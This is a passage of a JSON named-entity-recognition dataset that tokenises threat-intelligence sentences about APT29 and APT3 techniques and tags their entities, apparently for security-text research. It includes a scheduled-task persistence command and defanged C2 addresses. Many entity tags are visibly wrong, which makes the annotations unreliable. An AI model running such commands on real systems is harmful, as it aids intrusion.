"collecting", "emails", "from", "targeted", "mailboxes;", "APT29", "has", "also", "used", "compromised", "accounts", "holding", "`ApplicationImpersonation`", "rights", "in", "Exchange", "to", "collect", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT29", "used", "large", "size", "files", "to", "avoid", "detection", "by", "security", "solutions", "with", "hardcoded", "size", "limits." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "hijacked", "legitimate", "application-specific", "startup", "scripts", "to", "enable", "malware", "to", "execute", "on", "system", "startup." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "bypassed", "UAC." ], "ner_tags": [ "B-Idus", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "leveraged", "the", "Microsoft", "Graph", "API", "to", "perform", "various", "actions", "across", "Azure", "and", "M365", "environments.", "They", "have", "also", "utilized", "AADInternals", "PowerShell", "Modules", "to", "access", "the", "API" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "conducted", "enumeration", "of", "Azure", "AD", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "can", "create", "new", "users", "through", "Azure", "AD." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam" ] }, { "tokens": [ "APT29", "has", "used", "residential", "proxies,", "including", "Azure", "Virtual", "Machines,", "to", "obfuscate", "their", "access", "to", "victim", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "gained", "access", "to", "a", "global", "administrator", "account", "in", "Azure", "AD", "and", "has", "used", "`Service", "Principal`", "credentials", "in", "Exchange." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "Azure", "Run", "Command", "and", "Azure", "Admin-on-Behalf-of", "(AOBO)", "to", "execute", "code", "on", "virtual", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "B-Way", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "leveraged", "compromised", "high-privileged", "on-premises", "accounts", "synced", "to", "Office", "365", "to", "move", "laterally", "into", "a", "cloud", "environment,", "including", "through", "the", "use", "of", "Azure", "AD", "PowerShell." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "APT29", "has", "stolen", "data", "from", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "enrolled", "their", "own", "devices", "into", "compromised", "cloud", "tenants,", "including", "enrolling", "a", "device", "in", "MFA", "to", "an", "Azure", "AD", "environment", "following", "a", "successful", "password", "guessing", "attack", "against", "a", "dormant", "account." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "created", "self-signed", "digital", "certificates", "to", "enable", "mutual", "TLS", "authentication", "for", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "disabled", "Purview", "Audit", "on", "targeted", "accounts", "prior", "to", "stealing", "emails", "from", "Microsoft", "365", "tenants." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "B-Purp", "O", "I-Org", "I-Org", "O" ] }, { "tokens": [ "APT29", "has", "used", "the", "meek", "domain", "fronting", "plugin", "for", "Tor", "to", "hide", "the", "destination", "of", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "Dynamic", "DNS", "providers", "for", "their", "malware", "C2", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "B-Org", "B-Purp", "B-Org", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "compromised", "email", "accounts", "to", "further", "enable", "phishing", "campaigns", "and", "taken", "control", "of", "dormant", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "multiple", "layers", "of", "encryption", "within", "malware", "to", "protect", "C2", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "exploited", "CVE-2019-19781", "for", "Citrix,", "CVE-2019-11510", "for", "Pulse", "Secure", "VPNs,", "CVE-2018-13379", "for", "FortiGate", "VPNs,", "and", "CVE-2019-9670", "in", "Zimbra", "software", "to", "gain", "access." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "B-Way", "B-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "multiple", "software", "exploits", "for", "common", "client", "software,", "like", "Microsoft", "Word,", "Exchange,", "and", "Adobe", "Reader,", "to", "gain", "code", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "B-Tool", "O", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "exploited", "CVE-2021-36934", "to", "escalate", "privileges", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "uses", "compromised", "residential", "endpoints", "as", "proxies", "for", "defense", "evasion", "and", "network", "access." ], "ner_tags": [ "B-Idus", "O", "O", "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "compromised", "identities", "to", "access", "networks", "via", "VPNs", "and", "Citrix." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "APT29", "has", "used", "SDelete", "to", "remove", "artifacts", "from", "victim", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "embedded", "an", "ISO", "file", "within", "an", "HTML", "attachment", "that", "contained", "JavaScript", "code", "to", "initiate", "malware", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "uses", "compromised", "residential", "endpoints,", "typically", "within", "the", "same", "ISP", "IP", "address", "range,", "as", "proxies", "to", "hide", "the", "true", "source", "of", "C2", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "edited", "the", "`Microsoft.IdentityServer.Servicehost.exe.config`", "file", "to", "load", "a", "malicious", "DLL", "into", "the", "AD", "FS", "process,", "thereby", "enabling", "persistent", "access", "to", "any", "service", "federated", "with", "AD", "FS", "for", "a", "user", "with", "a", "specified", "User", "Principal", "Name." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "downloaded", "additional", "tools", "and", "malware", "onto", "compromised", "networks." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "ensured", "web", "servers", "in", "a", "victim", "environment", "are", "Internet", "accessible", "before", "copying", "tools", "or", "malware", "to", "it." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "the", "`reg", "save`", "command", "to", "extract", "LSA", "secrets", "offline." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "targets", "dormant", "or", "inactive", "user", "accounts,", "accounts", "belonging", "to", "individuals", "no", "longer", "at", "the", "organization", "but", "whose", "accounts", "remain", "on", "the", "system,", "for", "access", "and", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "various", "forms", "of", "spearphishing", "attempting", "to", "get", "a", "user", "to", "open", "attachments,", "including,", "but", "not", "limited", "to,", "malicious", "Microsoft", "Word", "documents,", ".pdf,", "and", ".lnk", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "APT29", "has", "used", "various", "forms", "of", "spearphishing", "attempting", "to", "get", "a", "user", "to", "click", "on", "a", "malicous", "link." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "unique", "malware", "in", "many", "of", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "embedded", "ISO", "images", "and", "VHDX", "files", "in", "HTML", "to", "evade", "Mark-of-the-Web." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "renamed", "malicious", "DLLs", "with", "legitimate", "names", "to", "appear", "benign;", "they", "have", "also", "created", "an", "Azure", "AD", "certificate", "with", "a", "Common", "Name", "that", "matched", "the", "display", "name", "of", "the", "compromised", "service", "principal." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Exp", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "use", "`mshta`", "to", "execute", "malicious", "scripts", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "repeated", "MFA", "requests", "to", "gain", "access", "to", "victim", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "A", "backdoor", "used", "by", "APT29", "created", "a", "Tor", "hidden", "service", "to", "forward", "traffic", "from", "the", "Tor", "client", "to", "local", "ports", "3389", "(RDP),", "139", "(Netbios),", "and", "445", "(SMB)", "enabling", "full", "remote", "access", "from", "outside", "the", "network", "and", "has", "also", "used", "TOR." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Idus", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT29", "used", "Kerberos", "ticket", "attacks", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "successfully", "conducted", "password", "guessing", "attacks", "against", "a", "list", "of", "mailboxes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "conducted", "brute", "force", "password", "spray", "attacks." ], "ner_tags": [ "B-Idus", "O", "O", "B-OffAct", "I-Way", "I-Way", "I-OffAct", "O" ] }, { "tokens": [ "APT29", "has", "used", "encoded", "PowerShell", "scripts", "uploaded", "to", "CozyCar", "installations", "to", "download", "and", "install", "SeaDuke." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT29", "has", "developed", "malware", "variants", "written", "in", "Python." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "installed", "a", "run", "command", "on", "a", "compromised", "system", "to", "enable", "malware", "execution", "on", "system", "startup." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "added", "Registry", "Run", "keys", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "collected", "emails", "from", "targeted", "mailboxes", "within", "a", "compromised", "Azure", "AD", "tenant", "and", "compromised", "Exchange", "servers,", "including", "via", "Exchange", "Web", "Services", "(EWS)", "API", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "named", "and", "hijacked", "scheduled", "tasks", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "the", "`reg", "save`", "command", "to", "save", "registry", "hives." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "used", "UPX", "to", "pack", "files." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "spearphishing", "emails", "with", "an", "attachment", "to", "deliver", "files", "with", "exploits", "to", "initial", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "spearphishing", "with", "a", "link", "to", "trick", "victims", "into", "clicking", "on", "a", "link", "to", "a", "zip", "file", "containing", "malicious", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "the", "legitimate", "mailing", "service", "Constant", "Contact", "to", "send", "phishing", "e-mails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT29", "uses", "stolen", "tokens", "to", "access", "victim", "accounts,", "without", "needing", "a", "password." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "abused", "misconfigured", "AD", "CS", "certificate", "templates", "to", "impersonate", "admin", "users", "and", "create", "additional", "authentication", "certificates." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "B-Org", "I-Org", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "APT29", "has", "used", "timestomping", "to", "alter", "the", "Standard", "Information", "timestamps", "on", "their", "web", "shells", "to", "match", "other", "files", "in", "the", "same", "directory." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "obtained", "and", "used", "a", "variety", "of", "tools", "including", "Mimikatz,", "SDelete,", "Tor,", "meek,", "and", "Cobalt", "Strike." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "APT29", "has", "compromised", "IT,", "cloud", "services,", "and", "managed", "services", "providers", "to", "gain", "broad", "access", "to", "multiple", "customers", "for", "subsequent", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "B-Idus", "I-Idus", "O", "O", "I-Org", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "a", "compromised", "account", "to", "access", "an", "organization's", "VPN", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "I-OffAct", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "conducted", "widespread", "scanning", "of", "target", "environments", "to", "identify", "vulnerabilities", "for", "exploit." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "registered", "algorithmically", "generated", "Twitter", "handles", "that", "are", "used", "for", "C2", "by", "malware,", "such", "as", "HAMMERTOSS.", "APT29", "has", "also", "used", "legitimate", "web", "services", "such", "as", "Dropbox", "and", "Constant", "Contact", "in", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Idus", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "installed", "web", "shells", "on", "exploited", "Microsoft", "Exchange", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "used", "WMI", "to", "steal", "credentials", "and", "execute", "backdoors", "at", "a", "future", "time." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT29", "has", "used", "WMI", "event", "subscriptions", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "APT3", "replaces", "the", "Sticky", "Keys", "binary", "<code>C:\\Windows\\System32\\sethc.exe</code>", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "add", "created", "accounts", "to", "local", "admin", "groups", "to", "maintain", "elevated", "access." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "B-Org", "I-Org", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "APT3", "has", "used", "tools", "to", "compress", "data", "before", "exfilling", "it." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "locate", "credentials", "in", "files", "on", "the", "file", "system", "such", "as", "those", "from", "Firefox", "or", "Chrome." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "used", "tools", "to", "dump", "passwords", "from", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "side", "load", "DLLs", "with", "a", "valid", "version", "of", "Chrome", "with", "one", "of", "their", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "will", "identify", "Microsoft", "Office", "documents", "on", "the", "victim's", "computer." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "leverages", "valid", "accounts", "after", "gaining", "credentials", "for", "use", "within", "the", "victim", "domain." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "exfiltrates", "data", "over", "the", "C2", "channel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "exploited", "the", "Adobe", "Flash", "Player", "vulnerability", "CVE-2015-3113", "and", "Internet", "Explorer", "vulnerability", "CVE-2014-1776." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Exp", "I-Exp", "I-Exp", "I-Exp", "B-Features", "O", "O", "I-Exp", "I-Exp", "B-Features" ] }, { "tokens": [ "An", "APT3", "downloader", "establishes", "SOCKS5", "connections", "for", "its", "initial", "C2." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "delete", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "looks", "for", "files", "and", "directories", "on", "the", "local", "file", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "use", "<code>-WindowStyle", "Hidden</code>", "to", "conceal", "PowerShell", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "remove", "indicators", "of", "compromise", "from", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "copy", "files", "to", "remote", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "used", "a", "keylogging", "tool", "that", "records", "keystrokes", "in", "encrypted", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "used", "a", "tool", "to", "dump", "credentials", "by", "injecting", "itself", "into", "lsass.exe", "and", "triggering", "with", "the", "argument", "\"dig.\"" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "used", "a", "tool", "that", "can", "obtain", "info", "about", "local", "and", "global", "group", "users,", "power", "users,", "and", "administrators." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "B-Purp", "O", "O", "O", "O", "O", "O", "I-Org", "O", "O", "B-Org" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "create", "or", "enable", "accounts,", "such", "as", "<code>support_388945a0</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "stage", "files", "for", "exfiltration", "in", "a", "single", "location." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-OffAct", "B-OffAct", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "lured", "victims", "into", "clicking", "malicious", "links", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "An", "APT3", "downloader", "first", "establishes", "a", "SOCKS5", "connection", "to", "192.157.198[.]103", "using", "TCP", "port", "1913;", "once", "the", "server", "response", "is", "verified,", "it", "then", "requests", "a", "connection", "to", "192.184.60[.]229", "on", "TCP", "port", "81." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT3", "downloader", "establishes", "SOCKS5", "connections", "for", "its", "initial", "C2." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "obfuscates", "files", "or", "information", "to", "help", "evade", "defensive", "measures." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "brute", "force", "password", "hashes", "to", "be", "able", "to", "leverage", "plain", "text", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "enumerate", "the", "permissions", "associated", "with", "Windows", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "used", "PowerShell", "on", "victim", "systems", "to", "download", "and", "run", "payloads", "after", "exploitation." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "list", "out", "currently", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "places", "scripts", "in", "the", "startup", "folder", "for", "persistence." ], "ner_tags": [ "B-Idus", "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "enables", "the", "Remote", "Desktop", "Protocol", "for", "persistence.", "APT3", "has", "also", "interacted", "with", "compromised", "systems", "to", "browse", "and", "copy", "files", "through", "RDP", "sessions." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "detect", "the", "existence", "of", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "run", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT3", "will", "copy", "files", "over", "to", "Windows", "Admin", "Shares", "(like", "ADMIN$)", "as", "part", "of", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT3", "downloader", "creates", "persistence", "by", "creating", "the", "following", "scheduled", "task:", "<code>schtasks", "/create", "/tn", "\"mysc\"", "/tr", "C:\\Users\\Public\\test.exe", "/sc", "ONLOGON", "/ru", "\"System\"</code>." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O" ] }, { "tokens": [ "APT3", "has", "been", "known", "to", "pack", "their", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "sent", "spearphishing", "emails", "containing", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "obtain", "information", "about", "the", "local", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "A", "keylogging", "tool", "used", "by", "APT3", "gathers", "network", "information", "from", "the", "victim,", "including", "the", "MAC", "address,", "IP", "address,", "WINS,", "DHCP", "server,", "and", "gateway." ], "ner_tags": [ "O", "B-Tool", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "can", "enumerate", "current", "network", "connections." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", 